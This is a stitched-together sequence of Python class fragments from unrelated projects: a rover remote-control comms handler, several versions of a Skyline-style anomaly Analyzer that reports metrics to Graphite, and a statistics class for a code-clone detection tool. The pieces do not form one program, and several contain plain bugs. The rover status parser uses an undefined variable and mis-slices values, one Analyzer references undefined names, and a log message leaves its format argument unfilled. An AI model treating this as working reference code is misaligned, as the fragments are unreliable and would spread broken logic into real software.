def comms_close(self): self.events['comms_enable'].clear() if self.commprocess.is_alive(): self.commprocess.join() self.comms_flush_rxtx_queues() msg = 'Connection to rover closed.\n' self.queues['log'].put(msg) self.queue_console.put(msg) def comms_push_command(self, cmdstring): ### clean the command first cmd=cmdstring.strip() self.queues['tx'].put(cmd) def comms_push_drive_lifo(self, cmdstring): self.drive_lifo.append(cmdstring) def comms_fetch_rx(self): reslist = [] count = 0 while (count < FETCH_RX_BURST_SIZE) and (self.queues['rx'].empty()==False): reslist.append(self.queues['rx'].get()) self.queues['rx'].task_done() count += 1 return reslist #################################################### ## Session logic #################################################### def msgtreat_status(self, message): ## it's a status message: msg_body = message[1:] malformed=None if len(msg_suffix)>0: ## battery ? if msg_suffix[0] == 'B': battery_str = msg_body[:1] if battery_str: self.rover_status['battery'] = float(msg_body[1:]) else: ## malformed battery status command : malformed = "warning:malformed battery status message:\"%s\"\n"%message ## speed ? if msg_suffix[0] == 'S': speed_setting_str = msg_body[1:] if speed_setting_str: self.rover_status['speed'] = int(speed_setting_str) else: malformed = "warning:malformed speed setting status message:\"%s\"\n"%message ## headlights ? if msg_suffix[0] == 'H': headlight_str = msg_body[1:] if headlight_str: headlight = headlight=='1' self.rover_status['headlights']=headlight else: malformed = "warning:malformed headlights status message:\"%s\"\n"%message if malformed is not None: self.queue_to_log_and_console(malformed) def msgtreat_default(self, message): ## by default, send it to the console queue self.queue_console.put(message) def analyze_received_messages(self,list_messages): ret=True for message in list_messages: if len(message)>0: msg0 = message[0] if msg0 in self.dict_dispatch_rx: self.dict_dispatch_rx[msg0](message) else: self.msgtreat_default(message) else: self.queue_to_log_and_console("warning: empty message received from rover:\"%s\"\n") ret=False return ret #################################################### ## Rover controls #################################################### ##### Status / Accessory def rover_request_status_update(self): self.comms_push_command('SU') def rover_headlights_on(self): self.comms_push_command('H1') def rover_headlights_off(self): self.comms_push_command('H0') ##### Drive def rover_drive(self,where='stop'): #print "push command ",where self.comms_push_command(self.dict_rover_drive[where]) #self.comms_push_drive_lifo(self.dict_rover_drive[where]) def rover_flush_drive_lifo(self,keep=1): if keep==0: self.drive_lifo = [] else: self.drive_lifo = self.drive_lifo[:-keep] #################################################### ## GUI Controls #################################################### def fetch_rx(self): reslist = [] count = 0 while (count < FETCH_RX_BURST_SIZE) and (self.queues['rx'].empty()==False): reslist.append(self.queues['rx'].get()) self.queues['rx'].task_done() count += 1 return reslist def fetch_console_messages(self): res=[] while self.queue_console.empty()==False: print 'something in console' res.append(self.queue_console.get()) self.queue_console.task_done() return res def fetch_status_updates(self): pass def is_rover_connected(self): if self.events['comms_enable'].is_set(): return not self.events['comms_server_disconnect'].is_set() else: return False def close(self): self.events['comms_enable'].clear() self.comms_flush_rxtx_queues() self.comms_close()
class Analyzer(Thread): """ The Analyzer class which controls the analyzer thread and spawned processes. """ def __init__(self, parent_pid): """ Initialize the Analyzer Create the :obj:`self.anomalous_metrics` list Create the :obj:`self.exceptions_q` queue Create the :obj:`self.anomaly_breakdown_q` queue """ super(Analyzer, self).__init__() self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() self.mirage_metrics = Manager().list() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def send_graphite_metric(self, name, value): """ Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite host is defined. """ if settings.GRAPHITE_HOST != '': skyline_app_metric = skyline_app_graphite_namespace + name sock = socket.socket() sock.settimeout(10) # Handle connection error to Graphite #116 @etsy # Fixed as per https://github.com/etsy/skyline/pull/116 and # mlowicki:etsy_handle_connection_error_to_graphite # Handle connection error to Graphite #7 @ earthgecko # merged 1 commit into earthgecko:master from # mlowicki:handle_connection_error_to_graphite on 16 Mar 2015 try: sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT)) sock.settimeout(None) except socket.error: sock.settimeout(None) endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT) logger.error("Can't connect to Graphite at %s" % endpoint) return False # For the same reason as above # sock.sendall('%s %s %i\n' % (name, value, time())) try: sock.sendall('%s %s %i\n' % (skyline_app_metric, value, time())) sock.close() return True except: endpoint = '%s:%d' % (settings.GRAPHITE_HOST, settings.CARBON_PORT) logger.error("Can't connect to Graphite at %s" % endpoint) return False return False def spin_process(self, i, unique_metrics): """ Assign a bunch of metrics for a process to analyze. Multiple get the assigned_metrics to the process from Redis. For each metric:\n * unpack the `raw_timeseries` for the metric.\n * Analyse each timeseries against `ALGORITHMS` to determine if it is\n anomalous.\n * If anomalous add it to the :obj:`self.anomalous_metrics` list\n * Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue\n Add keys and values to the queue so the parent process can collate for:\n * :py:obj:`self.anomaly_breakdown_q` * :py:obj:`self.exceptions_q` """ spin_start = time() logger.info('spin_process started') # Discover assigned metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES))) if i == settings.ANALYZER_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = min(len(unique_metrics), i * keys_per_processor) # Fix analyzer worker metric assignment #94 # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # assigned_keys = range(300, 310) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.redis_conn.mget(assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() # logger.info('analysing %s' % metric_name) try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name) # If it's anomalous, add it to list if anomalous: base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) metric = [datapoint, base_name] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? triggered_algorithms = [] for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 triggered_algorithms.append(algorithm) # It could have been deleted by the Roomba except TypeError: # logger.error('TypeError analysing %s' % metric_name) exceptions['DeletedByRoomba'] += 1 except TooShort: # logger.error('TooShort analysing %s' % metric_name) exceptions['TooShort'] += 1 except Stale: # logger.error('Stale analysing %s' % metric_name) exceptions['Stale'] += 1 except Boring: # logger.error('Boring analysing %s' % metric_name) exceptions['Boring'] += 1 except: # logger.error('Other analysing %s' % metric_name) exceptions['Other'] += 1 logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) spin_end = time() - spin_start logger.info('spin_process took %.2f seconds' % spin_end) def run(self): """ Called when the process intializes. Determine if Redis is up and discover the number of `unique metrics`. Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES` and assign each process a set of metrics to analyse for anomalies. Wait for the processes to finish. Process the Determine whether if any anomalous metrics require:\n * alerting on (and set `EXPIRATION_TIME` key in Redis for alert).\n * feeding to another module e.g. mirage. Populated the webapp json the anomalous_metrics details. Log the details about the run to the skyline log. Send skyline.analyzer metrics to `GRAPHITE_HOST`, """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) if not os.path.exists(settings.SKYLINE_TMP_DIR): if python_version == 2: os.makedirs(settings.SKYLINE_TMP_DIR, 0750) if python_version == 3: os.makedirs(settings.SKYLINE_TMP_DIR, mode=0o750) # Initiate the algorithm timings if Analyzer is configured to send the # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.' algorithms_to_time = [] if send_algorithm_run_metrics: algorithms_to_time = settings.ALGORITHMS while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Report app up self.redis_conn.setex(skyline_app, 120, now) # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Using count files rather that multiprocessing.Value to enable metrics for # metrics for algorithm run times, etc for algorithm in algorithms_to_time: algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count' algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings' # with open(algorithm_count_file, 'a') as f: with open(algorithm_count_file, 'w') as f: pass with open(algorithm_timings_file, 'w') as f: pass # Spawn processes pids = [] pid_count = 0 for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info('WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES))) p.start() # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than 180 seconds p_starts = time() while time() - p_starts <= 180: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Push to panorama # if len(self.panorama_anomalous_metrics) > 0: # logger.info('to do - push to panorama') # Push to crucible # if len(self.crucible_anomalous_metrics) > 0: # logger.info('to do - push to crucible') # Write anomalous_metrics to static webapp directory # Using count files rather that multiprocessing.Value to enable metrics for # metrics for algorithm run times, etc for algorithm in algorithms_to_time: algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count' algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings' try: algorithm_count_array = [] with open(algorithm_count_file, 'r') as f: for line in f: value_string = line.replace('\n', '') unquoted_value_string = value_string.replace("'", '') float_value = float(unquoted_value_string) algorithm_count_array.append(float_value) except: algorithm_count_array = False if not algorithm_count_array: continue number_of_times_algorithm_run = len(algorithm_count_array) logger.info( 'algorithm run count - %s run %s times' % ( algorithm, str(number_of_times_algorithm_run))) if number_of_times_algorithm_run == 0: continue try: algorithm_timings_array = [] with open(algorithm_timings_file, 'r') as f: for line in f: value_string = line.replace('\n', '') unquoted_value_string = value_string.replace("'", '') float_value = float(unquoted_value_string) algorithm_timings_array.append(float_value) except: algorithm_timings_array = False if not algorithm_timings_array: continue number_of_algorithm_timings = len(algorithm_timings_array) logger.info( 'algorithm timings count - %s has %s timings' % ( algorithm, str(number_of_algorithm_timings))) if number_of_algorithm_timings == 0: continue try: _sum_of_algorithm_timings = sum(algorithm_timings_array) except: logger.error("sum error: " + traceback.format_exc()) _sum_of_algorithm_timings = round(0.0, 6) logger.error('error - sum_of_algorithm_timings - %s' % (algorithm)) continue sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6) # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings)) try: _median_algorithm_timing = determine_median(algorithm_timings_array) except: _median_algorithm_timing = round(0.0, 6) logger.error('error - _median_algorithm_timing - %s' % (algorithm)) continue median_algorithm_timing = round(_median_algorithm_timing, 6) # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing)) logger.info( 'algorithm timing - %s - total: %.6f - median: %.6f' % ( algorithm, sum_of_algorithm_timings, median_algorithm_timing)) send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run' self.send_graphite_metric(send_mertic_name, '%d' % number_of_algorithm_timings) send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time' self.send_graphite_metric(send_mertic_name, '%.6f' % sum_of_algorithm_timings) send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time' self.send_graphite_metric(send_mertic_name, '%.6f' % median_algorithm_timing) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(unique_metrics)) logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite self.send_graphite_metric('run_time', '%.2f' % (time() - now)) self.send_graphite_metric('total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values()))) self.send_graphite_metric('total_anomalies', '%d' % len(self.anomalous_metrics)) self.send_graphite_metric('total_metrics', '%d' % len(unique_metrics)) for key, value in exceptions.items(): send_metric = 'exceptions.%s' % key self.send_graphite_metric(send_metric, '%d' % value) for key, value in anomaly_breakdown.items(): send_metric = 'anomaly_breakdown.%s' % key self.send_graphite_metric(send_metric, '%d' % value) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) self.send_graphite_metric('duration', '%.2f' % time_human) self.send_graphite_metric('projected', '%.2f' % projected) # Reset counters self.anomalous_metrics[:] = [] # Sleep if it went too fast # if time() - now < 5: # logger.info('sleeping due to low run time...') # sleep(10) # @modified 20160504 - @earthgecko - development internal ref #1338, #1340) # Etsy's original if this was a value of 5 seconds which does # not make skyline Analyzer very efficient in terms of installations # where 100s of 1000s of metrics are being analyzed. This lead to # Analyzer running over several metrics multiple time in a minute # and always working. Therefore this was changed from if you took # less than 5 seconds to run only then sleep. This behaviour # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and # then doing it again and again in a single minute. Therefore the # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to # self optimise in cases where skyline is NOT deployed to analyze # 100s of 1000s of metrics. This relates to optimising performance # for any deployments in the few 1000s and 60 second resolution # area, e.g. smaller and local deployments. process_runtime = time() - now analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION if process_runtime < analyzer_optimum_run_duration: sleep_for = (analyzer_optimum_run_duration - process_runtime) # sleep_for = 60 logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for) sleep(sleep_for)
class SharedData(object): """ Handles shared statistical data, which we want to collect over several executions of the ccdetection tool. Only shared values are used, so that multiple child processes can manipulate them. """ KEY_NODES = "nodes_total" KEY_INPATH = "in_path" KEY_CLONES = "clones" KEY_COUNTER = "counter" KEY_QUERY_TIME = "query_time_total" KEY_FIRST_COUNTER = "first_query_counter" KEY_PROJECTS_COUNTER = "projects_counter" KEY_FIRST_QUERY_TIME = "first_query_time_total" def __init__(self, path, lock, in_path=None): """ Setup all values to be shared (between processes) values. """ self.lock = lock self.path = path if os.path.isfile(path): self.loadData() else: self.in_path = in_path self.clones = Manager().list() self.counter = Value("i", 0) self.nodes_total = Value("i", 0) self.first_counter = Value("i", 0) self.query_time_total = Value("d", 0) self.projects_counter = Value("i", 0) self.first_query_time_total = Value("d", 0) def incProjectsCounter(self): """ Increase the counter of projects analysed. """ self.projects_counter.value += 1 def addQuery(self, query_time, first=False): """ Add the statistical data of a query that did not find a code clone. """ if first: self.first_counter.value += 1 self.first_query_time_total.value += query_time else: self.counter.value += 1 self.query_time_total.value += query_time def addFoundCodeClone(self, code_clone_data, first=False): """ Add the statistical data of a query that did find a code clone. """ self.addQuery(code_clone_data.getQueryTime(), first) self.clones.append(code_clone_data) def loadData(self): with open(self.path, "rb") as fh: data = pickle.load(fh) # Restore state from load data. self.in_path = data[self.KEY_INPATH] self.clones = Manager().list(data[self.KEY_CLONES]) self.counter = Value("i", data[self.KEY_COUNTER]) self.nodes_total = Value("i", data[self.KEY_NODES]) self.first_counter = Value("i", data[self.KEY_FIRST_COUNTER]) self.query_time_total = Value("d", data[self.KEY_QUERY_TIME]) self.projects_counter = Value("i", data[self.KEY_PROJECTS_COUNTER]) self.first_query_time_total = Value("d", data[self.KEY_FIRST_QUERY_TIME]) def saveData(self, queries, code_clones): """ Save the data of an analysed project to file. To avoid conflicts of multiple processes adding and saving data at the same time, we save all data atomically and using a lock, which prevents multiple executions at once. """ self.lock.acquire() # Increase projects counter. self.incProjectsCounter() # Add all query data. for query_dict in queries: self.addQuery(query_dict["query_time"], query_dict["first"]) # Add all data from found code clones for clone_dict in code_clones: self.addFoundCodeClone(clone_dict["clone"], clone_dict["first"]) self.saveToFile(self.path) self.lock.release() def __str__(self): try: avg_query_time_nofirst = (self.query_time_total.value/ float(self.counter.value)) except: avg_query_time_nofirst = 0 try: avg_query_time = ( (self.query_time_total.value + self.first_query_time_total.value)/ float(self.counter.value + self.first_counter.value) ) except: avg_query_time = 0 try: avg_first_query_time = (self.first_query_time_total.value/ float(self.first_counter.value)) except: avg_first_query_time = 0 try: avg_nodes = self.nodes_total.value/float(self.counter.value) except: avg_nodes = 0 data = ( "Projects analysed: %d\n" "Total queries executed: %d\n" "Average query time: %fs\n" "Average query time (without first query): %fs\n" "Average query time (first query only): %fs\n" "Average number of nodes in AST: %f\n" "Code clones found: %d" ) % ( self.projects_counter.value, self.counter.value + self.first_counter.value, avg_query_time, avg_query_time_nofirst, avg_first_query_time, avg_nodes, len(self.clones) ) return data def combineWith(self, shared_data): self.lock.acquire() # Add the data of shared_data to this file. self.in_path = shared_data.in_path self.nodes_total.value += shared_data.nodes_total.value for clone in shared_data.clones: self.clones.append(clone) self.counter.value += shared_data.counter.value self.query_time_total.value += shared_data.query_time_total.value self.first_counter.value += shared_data.first_counter.value self.projects_counter.value += shared_data.projects_counter.value self.first_query_time_total.value += ( shared_data.first_query_time_total.value ) self.lock.release() def saveToFile(self, out_file): # Transform data to dictionary for easy pickling. data = {} data[self.KEY_INPATH] = self.in_path data[self.KEY_NODES] = self.nodes_total.value data[self.KEY_CLONES] = [] for clone in self.clones: data[self.KEY_CLONES].append(clone) data[self.KEY_COUNTER] = self.counter.value data[self.KEY_QUERY_TIME] = self.query_time_total.value data[self.KEY_FIRST_COUNTER] = self.first_counter.value data[self.KEY_PROJECTS_COUNTER] = self.projects_counter.value data[self.KEY_FIRST_QUERY_TIME] = self.first_query_time_total.value # Save data to file. with open(out_file, "wb") as fh: pickle.dump(data, fh, pickle.HIGHEST_PROTOCOL) def getClones(self): clones = [] for clone in self.clones: clones.append(clone) return clones def getProjectsCount(self): return self.projects_counter.value def getInPath(self): return self.in_path def setInPath(self, path): self.in_path = path
class Analyzer(Thread): def __init__(self, parent_pid): """ Initialize the Analyzer """ super(Analyzer, self).__init__() self.ring = RedisRing(settings.REDIS_BACKENDS) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def spin_process(self, i, unique_metrics): process_key = '.'.join(['skyline','analyzer', socket.gethostname(), str(i)]) alive_key = '.'.join([process_key, 'alive']) self.ring.run('set', alive_key, 1) self.ring.run('expire', alive_key, 30) """ Assign a bunch of metrics for a process to analyze. """ processes = list(self.ring.run('zrange', settings.ANALYZER_PROCESS_KEY, 0, -1)) for key in processes: value = self.ring.run('get', key) if not value: self.ring.run('zrem', settings.ANALYZER_PROCESS_KEY, 0, key) # Add current process to index and determine position if not self.ring.run('zscore', settings.ANALYZER_PROCESS_KEY, alive_key): self.ring.run('zadd', settings.ANALYZER_PROCESS_KEY, time(), alive_key) self.ring.run('expire', settings.ANALYZER_PROCESS_KEY, 60) process_position = self.ring.run('zrank', settings.ANALYZER_PROCESS_KEY, alive_key) + 1 process_count = self.ring.run('zcard', settings.ANALYZER_PROCESS_KEY) # If there are less processes then we know are going to be running assume # the others will start if process_count < settings.ANALYZER_PROCESSES: process_count = settings.ANALYZER_PROCESSES # Discover assigned metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(process_count))) if process_position == process_count: assigned_max = len(unique_metrics) else: assigned_max = process_position * keys_per_processor assigned_min = assigned_max - keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.ring.run('mget', assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name) # If it's anomalous, add it to list if anomalous: base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) metric = [datapoint, base_name] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Incomplete: exceptions['Incomplete'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info(traceback.format_exc()) # if anomalies detected Pack and Write anomoly data to Redis if len(anomalous_metrics) > 0: packed = Packer().pack(anomalous_metrics) self.ring.run('set', process_key, packed) # expire the key in 30s so anomalys don't show up for too long self.ring.run('expire', process_key, 30) self.ring.run('sadd', settings.ANALYZER_ANOMALY_KEY, process_key) # expire the key in 60s so anomalys don't show up for too long self.ring.run('expire', settings.ANALYZER_ANOMALY_KEY, 60) # Collate process-specific dicts to main dicts with self.lock: for key, value in anomaly_breakdown.items(): if key not in self.anomaly_breakdown: self.anomaly_breakdown[key] = value else: self.anomaly_breakdown[key] += value for key, value in exceptions.items(): if key not in self.exceptions: self.exceptions[key] = value else: self.exceptions[key] += value for key, value in exceptions.items(): self.exceptions_q.put((key, value)) def run(self): """ Called when the process intializes. """ while 1: now = time() # Make sure Redis is up try: self.ring.check_connections() except: sleep(10) self.ring = RedisRing(settings.REDIS_BACKENDS) continue # Discover unique metrics unique_metrics = list(self.ring.run('smembers', settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info('WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Send alerts if settings.ENABLE_ALERTS: for alert in settings.ALERTS: for metric in self.anomalous_metrics: if alert[0] in metric[1]: cache_key = 'last_alert.%s.%s' % (alert[1], metric[1]) try: last_alert = self.ring.run('get', cache_key) if not last_alert: self.ring.run('setex', cache_key, alert[2], packb(metric[0])) trigger_alert(alert, metric) except Exception as e: logger.error("couldn't send alert: %s" % e) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(unique_metrics)) logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite if settings.GRAPHITE_HOST != '': host = settings.GRAPHITE_HOST.replace('http://', '') system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host)) system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(exceptions.values())), now, host)) # Check canary metric raw_series = self.ring.run('get', settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) if settings.GRAPHITE_HOST != '': host = settings.GRAPHITE_HOST.replace('http://', '') system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host)) system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host)) # Reset counters self.anomalous_metrics[:] = [] # Sleep if it went too fast if time() - now < 5: logger.info('sleeping due to low run time...') sleep(10)
class Analyzer(Thread): def __init__(self, parent_pid, storage): """ Initialize the Analyzer """ super(Analyzer, self).__init__() self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.lock = Lock() self.exceptions = Manager().dict() self.anomaly_breakdown = Manager().dict() self.anomalous_metrics = Manager().list() self.storage = storage self.alerter = Alerter(storage) def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def spin_process(self, i, unique_metrics): """ Assign a bunch of metrics for a process to analyze. """ # Discover assigned metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES))) if i == settings.ANALYZER_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = i * keys_per_processor assigned_min = assigned_max - keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.redis_conn.mget(assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint, ts = run_selected_algorithm(timeseries) # If it's anomalous, add it to list if anomalous: base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) metric = [datapoint, base_name, ts] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 # It could have been deleted by the Roomba except AttributeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Incomplete: exceptions['Incomplete'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info(traceback.format_exc()) # Collate process-specific dicts to main dicts with self.lock: for key, value in anomaly_breakdown.items(): if key not in self.anomaly_breakdown: self.anomaly_breakdown[key] = value else: self.anomaly_breakdown[key] += value for key, value in exceptions.items(): if key not in self.exceptions: self.exceptions[key] = value else: self.exceptions[key] += value def send_mail(self, alert, metric): """ Send an alert email to the appropriate recipient """ msg = MIMEMultipart('alternative') msg['Subject'] = '[skyline alert] ' + metric[1] msg['From'] = settings.ALERT_SENDER msg['To'] = alert[1] link = '%s/render/?width=588&height=308&target=%s' % (settings.GRAPHITE_HOST, metric[1]) body = 'Anomalous value: %s <br> Next alert in: %s seconds <a href="%s"><img src="%s"/></a>' % (metric[0], alert[2], link, link) msg.attach(MIMEText(body, 'html')) s = SMTP('127.0.0.1') s.sendmail(settings.ALERT_SENDER, alert[1], msg.as_string()) s.quit() def run(self): """ Called when the process intializes. """ while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH) continue # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') 